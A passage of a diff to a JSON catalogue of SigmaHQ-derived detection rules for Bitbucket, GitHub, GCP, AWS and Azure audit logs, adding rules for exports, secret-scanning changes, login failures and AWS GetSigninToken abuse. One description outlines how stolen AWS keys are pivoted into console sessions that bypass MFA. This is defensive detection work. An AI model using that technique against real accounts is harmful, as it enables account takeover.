Export Attempt" + }, + { + "description": "Detects changes to the bitbucket audit log configuration.", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Legitimate user activity." + ], + "filename": "bitbucket_audit_log_configuration_update_detected.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_log_configuration_update_detected.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "related": [ + { + "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "6aa12161-235a-4dfb-9c74-fe08df8d8da1", + "value": "Bitbucket Audit Log Configuration Updated" + }, + { + "description": "Detects when secret scanning rule is deleted for the project or repository.", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Legitimate user activity." + ], + "filename": "bitbucket_audit_secret_scanning_rule_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", + "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_secret_scanning_rule_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "related": [ + { + "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "ff91e3f0-ad15-459f-9a85-1556390c138d", + "value": "Bitbucket Secret Scanning Rule Deleted" + }, + { + "description": "Detects when full data export is attempted.", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Legitimate user activity." + ], + "filename": "bitbucket_audit_full_data_export_triggered.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", + "https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_full_data_export_triggered.yml" + ], + "tags": [ + "attack.collection", + "attack.t1213.003" + ] + }, + "related": [ + { + "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "195e1b9d-bfc2-4ffa-ab4e-35aef69815f8", + "value": "Bitbucket Full Data Export Triggered" + }, + { + "description": "Detects global permissions change activity.", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Legitimate user activity." + ], + "filename": "bitbucket_audit_global_permissions_change_detected.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", + "https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_permissions_change_detected.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1098" + ] + }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "aac6c4f4-87c7-4961-96ac-c3fd3a42c310", + "value": "Bitbucket Global Permission Changed" + }, + { + "description": "Detects when a secret scanning allowlist rule is added for projects.", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Legitimate user activity." + ], + "filename": "bitbucket_audit_project_secret_scanning_allowlist_added.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", + "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_project_secret_scanning_allowlist_added.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "related": [ + { + "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "42ccce6d-7bd3-4930-95cd-e4d83fa94a30", + "value": "Bitbucket Project Secret Scanning Allowlist Added" + }, + { + "description": "Detects SSH user login access failures.\nPlease note that this rule can be noisy and is recommended to use with correlation based on \"author.name\" field.\n", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Legitimate user wrong password attempts." + ], + "filename": "bitbucket_audit_user_login_failure_via_ssh_detected.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html", + "https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_login_failure_via_ssh_detected.yml" + ], + "tags": [ + "attack.t1021.004", + "attack.t1110" + ] + }, + "related": [ + { + "dest-uuid": "2db31dcd-54da-405d-acef-b9129b816ed6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "d3f90469-fb05-42ce-b67d-0fded91bbef3", + "value": "Bitbucket User Login Failure Via SSH" + }, + { + "description": "Detects when full data export is attempted an unauthorized user.", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Unlikely" + ], + "filename": "bitbucket_audit_unauthorized_full_data_export_triggered.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", + "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_unauthorized_full_data_export_triggered.yml" + ], + "tags": [ + "attack.collection", + "attack.resource_development", + "attack.t1213.003", + "attack.t1586" + ] + }, + "related": [ + { + "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "81033c3b-16a4-46e4-8fed-9b030dd03c4a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "34d81081-03c9-4a7f-91c9-5e46af625cde", + "value": "Bitbucket Unauthorized Full Data Export Triggered" + }, + { + "description": "Detects Bitbucket global secret scanning rule deletion activity.", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Legitimate user activity." + ], + "filename": "bitbucket_audit_global_secret_scanning_rule_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", + "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_secret_scanning_rule_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "related": [ + { + "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05", + "value": "Bitbucket Global Secret Scanning Rule Deleted" + }, + { + "description": "Detects user data export activity.", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Legitimate user activity." + ], + "filename": "bitbucket_audit_user_details_export_attempt_detected.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", + "https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_details_export_attempt_detected.yml" + ], + "tags": [ + "attack.collection", + "attack.reconnaissance", + "attack.discovery", + "attack.t1213", + "attack.t1082", + "attack.t1591.004" + ] + }, + "related": [ + { + "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "cc723aff-ec88-40e3-a224-5af9fd983cc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "5259cbf2-0a75-48bf-b57a-c54d6fabaef3", + "value": "Bitbucket User Details Export Attempt Detected" + }, + { + "description": "Detects user authentication failure events.\nPlease note that this rule can be noisy and it is recommended to use with correlation based on \"author.name\" field.\n", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Legitimate user wrong password attempts." + ], + "filename": "bitbucket_audit_user_login_failure_detected.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_login_failure_detected.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1078.004", + "attack.t1110" + ] + }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "70ed1d26-0050-4b38-a599-92c53d57d45a", + "value": "Bitbucket User Login Failure" + }, { "description": "Detects when a new member is added or invited to a github organization.", "meta": { - "author": "Muhammad Faisal", + "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023/01/29", "falsepositive": [ "Organization approved new members" @@ -83304,7 +83980,7 @@ { "description": "Detects when a user creates action secret for the organization, environment, codespaces or repository.", "meta": { - "author": "Muhammad Faisal", + "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023/01/20", "falsepositive": [ "This detection cloud be noisy depending on the environment. It is recommended to keep a check on the new secrets when created and validate the \"actor\"." @@ -83340,7 +84016,7 @@ { "description": "Detects delete action in the Github audit logs for codespaces, environment, project and repo.", "meta": { - "author": "Muhammad Faisal", + "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023/01/19", "falsepositive": [ "Validate the deletion activity is permitted. The \"actor\" field need to be validated." @@ -83374,7 +84050,7 @@ { "description": "Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.\n", "meta": { - "author": "Muhammad Faisal", + "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023/01/20", "falsepositive": [ "Validate the actor if permitted to access the repo.", @@ -83385,8 +84061,8 @@ "logsource.category": "No established category", "logsource.product": "github", "refs": [ - "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization", "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions", + "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_outside_collaborator_detected.yml" ], "tags": [ @@ -83426,7 +84102,7 @@ { "description": "Detects when a user disables a critical security feature for an organization.", "meta": { - "author": "Muhammad Faisal", + "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023/01/29", "falsepositive": [ "Approved administrator/owner activities." @@ -83436,9 +84112,9 @@ "logsource.category": "No established category", "logsource.product": "github", "refs": [ - "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions", "https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization", "https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository", + "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disable_high_risk_configuration.yml" ], "tags": [ @@ -83463,7 +84139,7 @@ { "description": "A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com.\nThis rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected,\nit should be validated from GitHub UI because the log entry may not provide full context.\n", "meta": { - "author": "Muhammad Faisal", + "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023/01/27", "falsepositive": [ "Allowed self-hosted runners changes in the environment.", @@ -83475,8 +84151,8 @@ "logsource.category": "No established category", "logsource.product": "github", "refs": [ - "https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners", "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation", + "https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_self_hosted_runner_changes_detected.yml" ], "tags": [ @@ -83521,7 +84197,7 @@ { "description": "Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts.\nThis rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.\n", "meta": { - "author": "Muhammad Faisal", + "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023/01/27", "falsepositive": [ "Approved changes by the Organization owner. Please validate the 'actor' if authorized to make the changes." @@ -83531,8 +84207,8 @@ "logsource.category": "No established category", "logsource.product": "github", "refs": [ - "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization", "https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts", + "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disabled_outdated_dependency_or_vulnerability.yml" ], "tags": [ @@ -83663,10 +84339,10 @@ "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", - "https://github.com/elastic/detection-rules/pull/1267", - "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", + "https://github.com/elastic/detection-rules/pull/1267", + "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", + "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_rolebinding.yml" ], "tags": [ @@ -83800,8 +84476,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_firewall_rule_modified_or_deleted.yml" ], "tags": [ @@ -84011,9 +84687,9 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://cloud.google.com/access-context-manager/docs/audit-logging", - "https://cloud.google.com/logging/docs/audit/understanding-audit-logs", "https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog", + "https://cloud.google.com/logging/docs/audit/understanding-audit-logs", + "https://cloud.google.com/access-context-manager/docs/audit-logging", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_access_policy_deleted.yml" ], "tags": [ @@ -84047,8 +84723,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_role_privilege_deleted.yml" ], "tags": [ @@ -84071,9 +84747,9 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_mfa_disabled.yml" ], "tags": [ @@ -84224,8 +84900,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml" ], "tags": [ @@ -84295,11 +84971,11 @@ "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", - "https://github.com/elastic/detection-rules/pull/1145/files", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", + "https://github.com/elastic/detection-rules/pull/1145/files", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_s3_data_management_tampering.yml" ], @@ -84950,8 +85626,8 @@ "logsource.product": "aws", "refs": [ "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html", - "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md", + "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_enum_buckets.yml" ], "tags": [ @@ -85092,8 +85768,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://github.com/elastic/detection-rules/pull/1213", "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", + "https://github.com/elastic/detection-rules/pull/1213", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sts_getsessiontoken_misuse.yml" ], "tags": [ @@ -85144,8 +85820,8 @@ "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", - "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", "https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html", + "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml" ], "tags": [ @@ -85323,6 +85999,48 @@ "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef", "value": "AWS EFS Fileshare Modified or Deleted" }, + { + "description": "Detects potentially suspicious events involving \"GetSigninToken\".\nAn adversary using the \"aws_consoler\" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.\n", + "meta": { + "author": "Chester Le Bron (@123Le_Bron)", + "creation_date": "2024/02/26", + "falsepositive": [ + "GetSigninToken events will occur when using AWS SSO portal to login and will generate false positives if you do not filter for the expected user agent(s), see filter. Non-SSO configured roles would be abnormal and should be investigated." + ], + "filename": "aws_console_getsignintoken.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/", + "https://github.com/NetSPI/aws_consoler", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_console_getsignintoken.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.007", + "attack.t1550.001" + ] + }, + "related": [ + { + "dest-uuid": "8861073d-d1b8-4941-82ce-dce621d398f0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f005e783-57d4-4837-88ad-dbe7faee1c51", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "f8103686-e3e8-46f3-be72-65f7fcb4aa53", + "value": "AWS Console GetSigninToken Potential Abuse" + }, { "description": "Detects possible suspicious glue development endpoint activity.", "meta": { @@ -85337,8 +86055,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml" ], "tags": [ @@ -86119,8 +86837,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://blooteem.com/march-2022", "https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/", + "https://blooteem.com/march-2022", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_suspicious_signin_bypassing_mfa.yml" ], "tags": [ @@ -86722,8 +87440,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules", "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml" ], "tags": [ @@ -86861,8 +87579,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#atypical-travel", "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#atypical-travel", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml" ], "tags": [ @@ -86932,8 +87650,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated", + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml" ], "tags": [ @@ -86966,8 +87684,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address", "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml" ], "tags": [ @@ -87037,8 +87755,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address", "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml" ], "tags": [ @@ -87322,8 +88040,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-user-activity", "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-user-activity", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml" ], "tags": [ @@ -88926,11 +89644,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_cluster_created_or_deleted.yml" ], "tags": [ @@ -89301,11 +90019,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_secret_or_config_object_access.yml" ], "tags": [ @@ -89329,11 +90047,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", 